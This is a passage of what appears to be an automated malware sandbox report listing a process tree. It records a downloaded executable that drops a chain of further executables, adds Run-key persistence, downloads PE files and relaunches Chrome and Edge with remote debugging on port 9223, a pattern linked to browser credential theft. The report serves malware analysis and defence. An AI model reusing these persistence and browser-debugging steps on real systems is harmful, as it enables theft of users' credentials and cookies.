  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3252 /prefetch:8
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:2828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5612 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4056

C:\Users\Admin\Downloads\random.exe
"C:\Users\Admin\Downloads\random.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3740
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:4700
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4692
      - C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:5816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffd103ccc40,0x7ffd103ccc4c,0x7ffd103ccc58
        8⤵
        
        PID:5924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2016 /prefetch:2
        8⤵
        
        PID:5592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2204 /prefetch:3
        8⤵
        
        PID:5648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2328,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8
        8⤵
        
        PID:6140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3276 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1720
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4504,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:8
        8⤵
        
        PID:4300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:8
        8⤵
        
        PID:5296
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4808,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:8
        8⤵
        
        PID:5516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:8
        8⤵
        
        PID:5824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5072 /prefetch:8
        8⤵
        
        PID:5992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5056 /prefetch:8
        8⤵
        
        PID:1996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5084 /prefetch:8
        8⤵
        
        PID:5412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5156,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4872 /prefetch:8
        8⤵
        
        PID:6016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5152,i,7768729801770358077,2832919760011341071,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:6452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:6612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
        8⤵
        
        PID:1620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8
        8⤵
        
        PID:4516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2888 /prefetch:2
        8⤵
        
        PID:4660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 /prefetch:2
        8⤵
        
        PID:2448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2748 /prefetch:2
        8⤵
        
        PID:3588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2
        8⤵
        
        PID:4748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4340 /prefetch:2
        8⤵
        
        PID:4980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2772 /prefetch:2
        8⤵
        
        PID:5608
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3588 /prefetch:2
        8⤵
        
        PID:6100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1483755450325445799,7258026051376024313,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4060 /prefetch:2
        8⤵
        
        PID:5744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
        8⤵
        
        PID:5576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
        8⤵
        
        PID:6112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
        8⤵
        
        PID:6124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2892 /prefetch:2
        8⤵
        
        PID:6824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
